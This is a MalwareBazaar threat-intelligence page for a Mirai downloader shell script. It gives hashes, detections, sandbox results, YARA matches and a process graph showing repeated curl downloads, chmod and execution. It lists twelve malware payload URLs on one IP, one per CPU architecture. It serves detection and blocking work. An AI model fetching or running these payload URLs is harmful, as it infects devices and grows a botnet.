MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 fa2b18cec0e94f9b4465ad67dfa6963fd587f54e4907e89693b7b10769bd1142. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 7


Intelligence 7 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: fa2b18cec0e94f9b4465ad67dfa6963fd587f54e4907e89693b7b10769bd1142
SHA3-384 hash: d062b7d4f49cf03cd86349eac016da8f3c93a1891bf308fe19d98f3d491f0769e82a13dd824cd07839ac1674f2455eb2
SHA1 hash: 1ffd9a98f1ee37306f91d08fe5360d1db21261a2
MD5 hash: e3ea9844a35fc82e155e0c617a9c485f
humanhash: wyoming-eight-tango-beryllium
File name:curl.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:1'079 bytes
First seen:2025-06-16 10:59:58 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 24:3J3McskfcslZcsQGNIxyYcszXKwcsydcsPRcsW1csyymcsrRcsQTcsdhcsWhf:qdkfdlZdYldzXBdyddPRdW1dyymdrRdr
TLSH T13E110BBC009CB906675AAF69F161BA2AF905C8E570E589C4F22DD531C5FEA28603D21F
Magika shell
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://103.149.252.178/skibidi/cutearm1bc137841445a32184b981463f26cf92cd5faee96c6530b71788322f6e02b74c Miraielf mirai ua-wget
http://103.149.252.178/skibidi/cutearm531bd74459680c387a1eb10667a44b7691101778b2eee79dd9e33c27cf18af7eb Miraielf mirai ua-wget
http://103.149.252.178/skibidi/cutearm6e7ed00ebd7a3124bf74c3a1e5de27d55daeba1a6c6dd9b507a5c4435eb87e78c Miraielf mirai ua-wget
http://103.149.252.178/skibidi/cutearm7b2510b90cc924b8bde71cb86f3875a466de3a4dff19efa2cc4d93173f38a3381 Miraielf mirai ua-wget
http://103.149.252.178/skibidi/cutem68kfc1848906eb6cf539a5009dfa5cbd87b822287242ceb9e04e7bd6f747a1f0a6e Miraielf mirai ua-wget
http://103.149.252.178/skibidi/cutemips994d3872166fd7b39d2c05628c86417140f456637e811f9235792c5b667947dd Miraielf mirai ua-wget
http://103.149.252.178/skibidi/cutemipsel88fcbf23a8273804bfb89bd72ef93c0d3d5d899a239cde333396d34184d15293 Miraielf ua-wget
http://103.149.252.178/skibidi/cutepowerpcf9d2eec0a3481cac09af0aa96723e831d4a66af87e48347fde818281d62af70e Miraielf mirai ua-wget
http://103.149.252.178/skibidi/cutesh4245daaf02866c349c32028beeaec0c428a85ad4a0fe3df40449ad0cdd2942db6 Miraielf gafgyt mirai ua-wget
http://103.149.252.178/skibidi/cutex8672f6704fdb711d1ba20c96a7ef73e7ac2cd41943cc4bdd417cab03417be1eb55 Miraielf mirai ua-wget
http://103.149.252.178/skibidi/cutex86_64a6880d908d5fa479ce234db7beed1598d5c8e9304696d3af7dc8cfee07a55e7e Miraielf mirai ua-wget
http://103.149.252.178/skibidi/cutex86_32d2d4f746e5138d2ec2e13b2331be588a2c09b94df979cf30fb128797c5315a64 Miraielf mirai ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
78
Origin country :
DE DE
Vendor Threat Intelligence
Detection(s):
SecuriteInfo.com.Linux.Downloader-33.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
92.5%
Link:
https://cyber-fortress.com/docs/result/index.php?id=684ff9598bd5d68a12e8c7delinux22vpnfull_triage
Tags:
agent hype sage
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/3050eb36-2ef6-4ea7-8bf0-46492864fd6a
Behavior Graph:
Download SVG
%3 guuid=dacc588f-2100-0000-fe19-d92757070000 pid=1879 /usr/bin/sudo guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886 /tmp/sample.bin guuid=dacc588f-2100-0000-fe19-d92757070000 pid=1879->guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886 execve guuid=f61ab991-2100-0000-fe19-d92760070000 pid=1888 /usr/bin/curl net send-data guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=f61ab991-2100-0000-fe19-d92760070000 pid=1888 execve guuid=13f15ace-2100-0000-fe19-d927ba070000 pid=1978 /usr/bin/chmod guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=13f15ace-2100-0000-fe19-d927ba070000 pid=1978 execve guuid=088db3ce-2100-0000-fe19-d927bb070000 pid=1979 /usr/bin/dash guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=088db3ce-2100-0000-fe19-d927bb070000 pid=1979 clone guuid=6e4ecace-2100-0000-fe19-d927bc070000 pid=1980 /usr/bin/curl net send-data guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=6e4ecace-2100-0000-fe19-d927bc070000 pid=1980 execve guuid=938e940d-2200-0000-fe19-d92737080000 pid=2103 /usr/bin/chmod guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=938e940d-2200-0000-fe19-d92737080000 pid=2103 execve guuid=47e8d70d-2200-0000-fe19-d92739080000 pid=2105 /usr/bin/dash guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=47e8d70d-2200-0000-fe19-d92739080000 pid=2105 clone guuid=a8d4dc0d-2200-0000-fe19-d9273a080000 pid=2106 /usr/bin/curl net send-data guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=a8d4dc0d-2200-0000-fe19-d9273a080000 pid=2106 execve guuid=76e6762c-2200-0000-fe19-d92798080000 pid=2200 /usr/bin/chmod guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=76e6762c-2200-0000-fe19-d92798080000 pid=2200 execve guuid=4008be2c-2200-0000-fe19-d92799080000 pid=2201 /usr/bin/dash guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=4008be2c-2200-0000-fe19-d92799080000 pid=2201 clone guuid=8370ce2c-2200-0000-fe19-d9279a080000 pid=2202 /usr/bin/curl net send-data guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=8370ce2c-2200-0000-fe19-d9279a080000 pid=2202 execve guuid=f38bbe67-2200-0000-fe19-d9270b090000 pid=2315 /usr/bin/chmod guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=f38bbe67-2200-0000-fe19-d9270b090000 pid=2315 execve guuid=38981568-2200-0000-fe19-d9270d090000 pid=2317 /usr/bin/dash guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=38981568-2200-0000-fe19-d9270d090000 pid=2317 clone guuid=e8ca1b68-2200-0000-fe19-d9270f090000 pid=2319 /usr/bin/curl net send-data guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=e8ca1b68-2200-0000-fe19-d9270f090000 pid=2319 execve guuid=7c7cc3a0-2200-0000-fe19-d9277d090000 pid=2429 /usr/bin/chmod guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=7c7cc3a0-2200-0000-fe19-d9277d090000 pid=2429 execve guuid=415d07a1-2200-0000-fe19-d9277f090000 pid=2431 /usr/bin/dash guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=415d07a1-2200-0000-fe19-d9277f090000 pid=2431 clone guuid=7cab17a1-2200-0000-fe19-d92780090000 pid=2432 /usr/bin/curl net send-data guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=7cab17a1-2200-0000-fe19-d92780090000 pid=2432 execve guuid=623d3dda-2200-0000-fe19-d927090a0000 pid=2569 /usr/bin/chmod guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=623d3dda-2200-0000-fe19-d927090a0000 pid=2569 execve guuid=675587da-2200-0000-fe19-d9270b0a0000 pid=2571 /usr/bin/dash guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=675587da-2200-0000-fe19-d9270b0a0000 pid=2571 clone guuid=1c5e8cda-2200-0000-fe19-d9270c0a0000 pid=2572 /usr/bin/curl net send-data guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=1c5e8cda-2200-0000-fe19-d9270c0a0000 pid=2572 execve guuid=d2bcfa13-2300-0000-fe19-d927a80a0000 pid=2728 /usr/bin/chmod guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=d2bcfa13-2300-0000-fe19-d927a80a0000 pid=2728 execve guuid=607e7a14-2300-0000-fe19-d927aa0a0000 pid=2730 /usr/bin/dash guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=607e7a14-2300-0000-fe19-d927aa0a0000 pid=2730 clone guuid=20489214-2300-0000-fe19-d927ac0a0000 pid=2732 /usr/bin/curl net send-data guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=20489214-2300-0000-fe19-d927ac0a0000 pid=2732 execve guuid=0f34124d-2300-0000-fe19-d9272c0b0000 pid=2860 /usr/bin/chmod guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=0f34124d-2300-0000-fe19-d9272c0b0000 pid=2860 execve guuid=2df8514d-2300-0000-fe19-d9272d0b0000 pid=2861 /usr/bin/dash guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=2df8514d-2300-0000-fe19-d9272d0b0000 pid=2861 clone guuid=cf905c4d-2300-0000-fe19-d9272f0b0000 pid=2863 /usr/bin/curl net send-data guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=cf905c4d-2300-0000-fe19-d9272f0b0000 pid=2863 execve guuid=4915407a-2300-0000-fe19-d9278a0b0000 pid=2954 /usr/bin/chmod guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=4915407a-2300-0000-fe19-d9278a0b0000 pid=2954 execve guuid=29e6877a-2300-0000-fe19-d9278b0b0000 pid=2955 /usr/bin/dash guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=29e6877a-2300-0000-fe19-d9278b0b0000 pid=2955 clone guuid=0b64977a-2300-0000-fe19-d9278c0b0000 pid=2956 /usr/bin/curl net send-data guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=0b64977a-2300-0000-fe19-d9278c0b0000 pid=2956 execve guuid=2053469a-2300-0000-fe19-d927de0b0000 pid=3038 /usr/bin/chmod guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=2053469a-2300-0000-fe19-d927de0b0000 pid=3038 execve guuid=f3e7c39a-2300-0000-fe19-d927e00b0000 pid=3040 /usr/bin/dash guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=f3e7c39a-2300-0000-fe19-d927e00b0000 pid=3040 clone guuid=18e0cb9a-2300-0000-fe19-d927e10b0000 pid=3041 /usr/bin/curl net send-data guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=18e0cb9a-2300-0000-fe19-d927e10b0000 pid=3041 execve guuid=106859d2-2300-0000-fe19-d927750c0000 pid=3189 /usr/bin/chmod guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=106859d2-2300-0000-fe19-d927750c0000 pid=3189 execve guuid=a1d8a2d2-2300-0000-fe19-d927760c0000 pid=3190 /usr/bin/dash guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=a1d8a2d2-2300-0000-fe19-d927760c0000 pid=3190 clone guuid=13c8aed2-2300-0000-fe19-d927770c0000 pid=3191 /usr/bin/curl net send-data guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=13c8aed2-2300-0000-fe19-d927770c0000 pid=3191 execve guuid=c19460ff-2300-0000-fe19-d927a30c0000 pid=3235 /usr/bin/chmod guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=c19460ff-2300-0000-fe19-d927a30c0000 pid=3235 execve guuid=0413bdff-2300-0000-fe19-d927a40c0000 pid=3236 /usr/bin/dash guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=0413bdff-2300-0000-fe19-d927a40c0000 pid=3236 clone guuid=1bdfcbff-2300-0000-fe19-d927a50c0000 pid=3237 /usr/bin/rm delete-file guuid=484a3191-2100-0000-fe19-d9275e070000 pid=1886->guuid=1bdfcbff-2300-0000-fe19-d927a50c0000 pid=3237 execve b95ce511-3591-5114-995b-9ce77bb440cb 103.149.252.178:80 guuid=f61ab991-2100-0000-fe19-d92760070000 pid=1888->b95ce511-3591-5114-995b-9ce77bb440cb send: 94B guuid=6e4ecace-2100-0000-fe19-d927bc070000 pid=1980->b95ce511-3591-5114-995b-9ce77bb440cb send: 95B guuid=a8d4dc0d-2200-0000-fe19-d9273a080000 pid=2106->b95ce511-3591-5114-995b-9ce77bb440cb send: 95B guuid=8370ce2c-2200-0000-fe19-d9279a080000 pid=2202->b95ce511-3591-5114-995b-9ce77bb440cb send: 95B guuid=e8ca1b68-2200-0000-fe19-d9270f090000 pid=2319->b95ce511-3591-5114-995b-9ce77bb440cb send: 95B guuid=7cab17a1-2200-0000-fe19-d92780090000 pid=2432->b95ce511-3591-5114-995b-9ce77bb440cb send: 95B guuid=1c5e8cda-2200-0000-fe19-d9270c0a0000 pid=2572->b95ce511-3591-5114-995b-9ce77bb440cb send: 97B guuid=20489214-2300-0000-fe19-d927ac0a0000 pid=2732->b95ce511-3591-5114-995b-9ce77bb440cb send: 98B guuid=cf905c4d-2300-0000-fe19-d9272f0b0000 pid=2863->b95ce511-3591-5114-995b-9ce77bb440cb send: 94B guuid=0b64977a-2300-0000-fe19-d9278c0b0000 pid=2956->b95ce511-3591-5114-995b-9ce77bb440cb send: 94B guuid=18e0cb9a-2300-0000-fe19-d927e10b0000 pid=3041->b95ce511-3591-5114-995b-9ce77bb440cb send: 97B guuid=13c8aed2-2300-0000-fe19-d927770c0000 pid=3191->b95ce511-3591-5114-995b-9ce77bb440cb send: 97B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/fa2b18cec0e94f9b4465ad67dfa6963fd587f54e4907e89693b7b10769bd1142
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/fa2b18cec0e94f9b4465ad67dfa6963fd587f54e4907e89693b7b10769bd1142/
Verdict:
Malicious
Link:
https://tip.neiki.dev/file/fa2b18cec0e94f9b4465ad67dfa6963fd587f54e4907e89693b7b10769bd1142
Threat name:
Document-HTML.Trojan.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2025-06-16 11:00:30 UTC
File Type:
Text (Shell)
AV detection:
7 of 23 (30.43%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=7ivrrtwa5fhzwrdfvvt57juwh7kyp5kojed6rfutw6yqo2n5cfba._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/250616-m37gpsyvaw/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/fa2b18cec0e94f9b4465ad67dfa6963fd587f54e4907e89693b7b10769bd1142

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:RANSOMWARE
Create hunting rule
Author:ToroGuitar

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh fa2b18cec0e94f9b4465ad67dfa6963fd587f54e4907e89693b7b10769bd1142

(this sample)

Mirai

elf b88e2e021e5425f6b68ab8ce04bc20b86be3fd599134d18ab60d0ce3a570f625

  
URLhaus
https://urlhaus.abuse.ch/url/3561022/
  
Delivery method
Distributed via web download
  
URLhaus
https://urlhaus.abuse.ch/url/3561452/
  
Dropping
MD5 e65d8890e756e2cbda53e88b578a1cb7
  
Dropping
SHA256 b88e2e021e5425f6b68ab8ce04bc20b86be3fd599134d18ab60d0ce3a570f625

Comments